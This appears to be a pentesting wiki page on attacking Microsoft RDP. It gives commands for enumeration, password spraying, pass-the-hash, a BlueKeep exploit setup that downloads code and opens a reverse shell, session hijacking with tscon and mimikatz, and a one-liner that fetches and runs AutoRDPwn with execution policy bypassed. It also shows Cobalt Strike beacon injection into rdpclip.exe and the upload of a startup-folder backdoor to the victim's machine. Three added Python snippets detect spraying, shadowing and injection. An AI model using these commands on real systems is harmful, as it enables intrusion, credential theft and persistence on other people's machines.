Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.
Network Level Authentication (NLA) authenticates the user before the RDP session is opened, which avoids unnecessary load on the server when the person cannot authenticate. The CredSSP protocol is used for this authentication.
Practice
Enumerate
We can use nmap to enumerate information about the running RDP server
```
# Enum NetBIOS, DNS, and OS build version
nmap -p 3389 --script rdp-ntlm-info <target>
# Enum available encryption and CredSSP (NLA)
nmap -p 3389 --script rdp-enum-encryption <target>
```
```
# Hydra
hydra -L <userslist> -p 'password123' rdp://<IP>
# NetExec - Spray on target
netexec rdp <IP> -u <userlist> -p 'password123'
# NetExec - Spray on subnet
netexec rdp 10.10.10.0/24 -u <userlist> -p 'password123'
```
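On the defensive side, a spray like the one above leaves one source IP failing against many distinct accounts in a short window. The following is an added example (not part of the original page) that flags that pattern over constructed Windows Security 4625/4624 records; the one-line `Key=Value` format and sample values are assumptions for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real logs): Windows Security events 4625 (failed logon)
# and 4624 (successful logon), flattened to one line each. With NLA enabled a
# failed RDP attempt is normally recorded as LogonType=3 (network) rather than
# 10, so the filter below accepts both; a successful RDP session logs as 10.
SAMPLE_EVENTS = """
2024-05-01T10:00:01 EventID=4625 LogonType=3 TargetUserName=alice IpAddress=10.10.10.5
2024-05-01T10:00:02 EventID=4625 LogonType=3 TargetUserName=bob IpAddress=10.10.10.5
2024-05-01T10:00:03 EventID=4625 LogonType=3 TargetUserName=carol IpAddress=10.10.10.5
2024-05-01T10:00:04 EventID=4625 LogonType=3 TargetUserName=dave IpAddress=10.10.10.5
2024-05-01T10:00:05 EventID=4625 LogonType=3 TargetUserName=erin IpAddress=10.10.10.5
2024-05-01T10:00:09 EventID=4624 LogonType=10 TargetUserName=erin IpAddress=10.10.10.5
2024-05-01T10:02:30 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=192.168.1.20
""".strip().splitlines()

def parse_event(line):
    """'<iso-timestamp> Key=Value ...' -> dict, with a datetime under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.fromisoformat(ts)
    return fields

def detect_rdp_spray(lines, window=timedelta(minutes=5), min_users=5):
    """Flag source IPs whose failed logons hit >= min_users distinct accounts
    within `window`; also list accounts that later logged on from that IP."""
    failures, successes = defaultdict(list), defaultdict(set)
    for ev in map(parse_event, lines):
        if ev.get("LogonType") not in ("3", "10"):
            continue
        if ev["EventID"] == "4625":
            failures[ev["IpAddress"]].append((ev["ts"], ev["TargetUserName"]))
        elif ev["EventID"] == "4624":
            successes[ev["IpAddress"]].add(ev["TargetUserName"])
    hits = {}
    for src, attempts in failures.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - t0 <= window}
            if len(users) >= min_users:
                hits[src] = {"sprayed": sorted(users),
                             "compromised": sorted(successes[src] & users)}
                break
    return hits

if __name__ == "__main__":
    for src, info in detect_rdp_spray(SAMPLE_EVENTS).items():
        print(src, info)
```

A single mistyped password from 192.168.1.20 is not reported, while the 4624 for `erin` right after the spray from 10.10.10.5 is surfaced as the account to reset first.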
Logging in
We can use xfreerdp to connect to an RDP server with known credentials or with the pass-the-hash technique.
```
# With credentials
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
# Dynamic resolution, clipboard, and mount a local folder as an SMB share on the RDP server
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP> +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
# Pass the hash
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>
```
We can use rdesktop to connect to an RDP server with known credentials
```
rdesktop -d <domain> -u <username> -p <password> <IP>
```
Using the rdp_check.py script from impacket, we can check whether some credentials are valid for an RDP service
```
python rdp_check.py <domain>/<name>:<password>@<IP>
```
Using netexec, we can check whether some credentials are valid for an RDP service
```
netexec rdp <IP> -u <user> -p <password>
```
Headless RDP
Executing commands on a remote host is possible with a headless (non-GUI) RDP lateral movement technique provided by a tool called SharpRDP.
```
# Execute commands on DC01 from a compromised system as offense\administrator
SharpRDP.exe computername=dc01 command=calc username=offense\administrator password=123456
```
Vulnerabilities
MS12-020 (CVE-2012-0152)
This CVE addresses a denial of service (DoS) vulnerability in the Remote Desktop Service.
Tools like nmap can be used to detect the presence of the CVE-2012-0152 vulnerability without crashing the target.
```
nmap -sV --script=rdp-vuln-ms12-020 -p 3389 <target>
```
We can use this Python exploit (do not forget to change the hardcoded IP)
```
python2.7 ms12-020.py
```
BlueKeep - CVE-2019-0708
RDP uses "virtual channels", configured before authentication, as a data path between the client and server for providing extensions. RDP 5.1 defines 32 "static" virtual channels, and "dynamic" virtual channels are contained within one of these static channels. If a server binds the virtual channel "MS_T120" (a channel a client has no legitimate reason to connect to) to a static channel other than 31, heap corruption occurs that allows arbitrary code execution at the system level.
BlueKeep, or CVE-2019-0708, is an RCE vulnerability that affects the following versions of Windows:
Windows 2003
Windows XP
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows 8, 10, 11, Windows Server 2012 and above are not affected.
If the target exposes RDP and runs one of the Windows versions listed above, it is vulnerable.
```
# Check OS version & RDP service using nmap
nmap -O -p 3389 <TARGET_IP>
```
Alternatively, we can use rdp_detect_info.py from worawit's GitHub repository to detect the vulnerability
```
python rdp_detect_info.py <TARGET_IP>
```
Additionally, we can use metasploit to scan a target
```
msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf> set RHOST <TARGET_IP>
msf> run
```
To exploit, we may use the RICSecLab exploit on GitHub to gain a reverse shell.
This exploit has been made for Windows 7 targets.
The exploit may cause the target system to crash.
```
# Build your environment
git clone https://github.com/RICSecLab/CVE-2019-0708 && cd CVE-2019-0708
git clone https://github.com/gosecure/pyrdp.git && cd pyrdp
python3 -m venv venv
source venv/bin/activate
pip3 install -U pip setuptools wheel
pip3 install -U -e '.[full]'
cd ..
rm exploit.py
wget https://raw.githubusercontent.com/yassineaboukir/CVE-2019-0708/4f4ff5a9eef5ed4cda92376b25667fd5272d9753/exploit.py
# Exploit
python exploit.py <TARGET_IP> -rp <RDP_PORT> <ATTACKING_IP> -bp <ATTACKING_PORT>
```
This vulnerability can also be exploited with the Metasploit framework.
With SYSTEM permissions you can take over any open RDP session of any user without knowing the owner's password. It uses only built-in Windows tools and features.
On the target system:
```
# Get open sessions
query user
# Attach to the selected session
tscon <ID> /dest:<SESSIONNAME>
```
When you take over an active RDP session, the user that was using it gets kicked off.
We can perform this attack with mimikatz
```
mimikatz> ts::sessions        # Get sessions
mimikatz> ts::remote /id:2    # Connect to the session
```
Shadow Attack
AutoRDPwn is a post-exploitation framework written in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view the victim's desktop without their consent, and even control it on demand, using tools native to the operating system itself. More info here
```
# Local execution one-liner
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
# From target on reverse shell - create the AutoRDPwn:AutoRDPwn user (may try w/o admin rights with -noadmin)
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
# Connect to shadow sessions with created credentials
mstsc /v win10pro /admin /shadow:1 /control /noconsentprompt /prompt /f
```
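Both the `tscon /dest:` session takeover and the `mstsc /shadow:` Shadow attack above are visible in process-creation telemetry. The following is an added detection example (not part of the original page or of AutoRDPwn) that classifies constructed Sysmon Event 1 / Security 4688 records by image and command line; the record layout and sample values are assumptions for the demo.

```python
# Constructed sample process-creation records (not real telemetry), in the shape
# a SIEM gives after parsing Sysmon Event 1 / Security 4688.
SAMPLE_PROCS = [
    {"User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\tscon.exe",
     "CommandLine": "tscon 2 /dest:rdp-tcp#5"},
    {"User": "CORP\\helpdesk1", "Image": "C:\\Windows\\System32\\mstsc.exe",
     "CommandLine": "mstsc /v win10pro /shadow:1 /control /noconsentprompt /prompt /f"},
    {"User": "CORP\\helpdesk1", "Image": "C:\\Windows\\System32\\mstsc.exe",
     "CommandLine": "mstsc /v win10pro /shadow:1"},
    {"User": "CORP\\alice", "Image": "C:\\Windows\\System32\\mstsc.exe",
     "CommandLine": "mstsc /v:fileserver01"},
]

def classify(proc):
    """Return (severity, reason) for an RDP session takeover pattern, or None."""
    image = proc["Image"].rsplit("\\", 1)[-1].lower()
    args = [a.lower() for a in proc["CommandLine"].split()[1:]]
    if image == "tscon.exe" and any(a.startswith("/dest:") for a in args):
        # tscon /dest: attaches another session to the caller's session; run as
        # SYSTEM it needs no password, which is the hijack described above.
        as_system = proc["User"].upper() == "NT AUTHORITY\\SYSTEM"
        return ("high" if as_system else "medium", "session hijack via tscon /dest:")
    if image == "mstsc.exe" and any(a.startswith("/shadow:") for a in args):
        # Shadowing with the consent prompt suppressed (and optionally input
        # control) is the Shadow attack; with the prompt kept it is ordinary
        # helpdesk usage, worth logging but not alerting on.
        if "/noconsentprompt" in args:
            reason = "shadow session with /noconsentprompt"
            if "/control" in args:
                reason += " and /control"
            return ("high", reason)
        return ("low", "shadow session with consent prompt")
    return None

def alerts(procs, min_severity=("medium", "high")):
    """Keep only records whose classification reaches min_severity."""
    out = []
    for p in procs:
        hit = classify(p)
        if hit and hit[0] in min_severity:
            out.append((hit[0], hit[1], p["User"], p["CommandLine"]))
    return out
```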
RDP Process Injection (rdpclip.exe)
If someone from a different domain, or with higher privileges, logs in via RDP to a PC where you are an admin, you can inject your beacon into their RDP session process and act as them.
```
# Supposing the group "External Users" has RDP access in the current domain
## let's find where they could access
## The easiest way would be with BloodHound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
# or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait till someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With Cobalt Strike you could just inject a beacon inside of the RDP process
beacon> ps

 PID   PPID  Name          Arch  Session  User
 ---   ----  ----          ----  -------  ----
 ...
 4960  1012  rdpclip.exe   x64   3        EXT\super.admin

beacon> inject 4960 x64 tcp-local

## From that beacon you can just run PowerView modules interacting with the external domain as that user
```
If a user connects via RDP to a machine where an attacker with admin privileges is waiting, the attacker can inject a beacon into the user's RDP session, and if the victim mounted their drive when connecting via RDP, the attacker can access it.
In this case you could compromise the victim's original computer by writing a backdoor into the startup folder.
```
# Wait till someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With Cobalt Strike you could just inject a beacon inside of the RDP process
beacon> ps

 PID   PPID  Name          Arch  Session  User
 ---   ----  ----          ----  -------  ----
 ...
 4960  1012  rdpclip.exe   x64   3        EXT\super.admin

beacon> inject 4960 x64 tcp-local

# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     02/10/2021 04:11:30   $Recycle.Bin
          dir     02/10/2021 03:23:44   Boot
          dir     02/20/2021 10:15:23   Config.Msi
          dir     10/18/2016 01:59:39   Documents and Settings
 [...]

# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
```
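The two host-side artifacts of this technique are a thread created inside rdpclip.exe by a foreign image and a file written through `\\tsclient\<drive>` into the client's Startup folder. The following is an added detection example (not part of the original page or of Cobalt Strike) over constructed Sysmon Event 8 (CreateRemoteThread) and Event 11 (FileCreate) records; the field names follow Sysmon, while the sample values and the trusted-injector allowlist are assumptions to tune per environment.

```python
import re

# Constructed sample Sysmon records (not real telemetry), already parsed: Event 8
# is CreateRemoteThread, Event 11 is FileCreate.
SAMPLE_SYSMON = [
    {"EventID": 8, "SourceImage": "C:\\Users\\lowpriv\\Downloads\\update.exe",
     "TargetImage": "C:\\Windows\\System32\\rdpclip.exe"},
    {"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Windows\\System32\\rdpclip.exe"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\rdpclip.exe",
     "TargetFilename": "\\\\tsclient\\c\\Users\\super.admin\\AppData\\Roaming\\"
                       "Microsoft\\Windows\\Start Menu\\Programs\\Startup\\pivot.exe"},
    {"EventID": 11, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "\\\\tsclient\\c\\Users\\super.admin\\Documents\\notes.txt"},
]

# Redirected-drive path of the RDP client's Startup folder, e.g.
# \\tsclient\c\Users\<name>\...\Start Menu\Programs\Startup\<file>
TSCLIENT_STARTUP = re.compile(
    r"^\\\\tsclient\\[a-z]\\.*\\start menu\\programs\\startup\\[^\\]+$", re.I)
# Assumed allowlist of Windows images that legitimately create threads in other
# processes; anything else starting a thread inside rdpclip.exe looks like injection.
TRUSTED_INJECTORS = {"csrss.exe", "svchost.exe", "lsass.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check(ev):
    """Return an alert string for the rdpclip injection / tsclient dropper
    pattern, or None."""
    if ev["EventID"] == 8 and basename(ev["TargetImage"]) == "rdpclip.exe":
        if basename(ev["SourceImage"]) not in TRUSTED_INJECTORS:
            return "remote thread in rdpclip.exe from " + ev["SourceImage"]
    if ev["EventID"] == 11 and TSCLIENT_STARTUP.match(ev["TargetFilename"]):
        # A file written into the *client's* Startup folder over the redirected
        # drive runs on the client's next logon: persistence on the origin host.
        return "file dropped in RDP client Startup folder by " + ev["Image"]
    return None

def scan(events):
    return [a for a in map(check, events) if a]
```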
Persistence - Sticky Keys & Utilman
Using sticky keys or utilman as a persistence vector, you will be able to access an administrative CMD in any RDP session at any time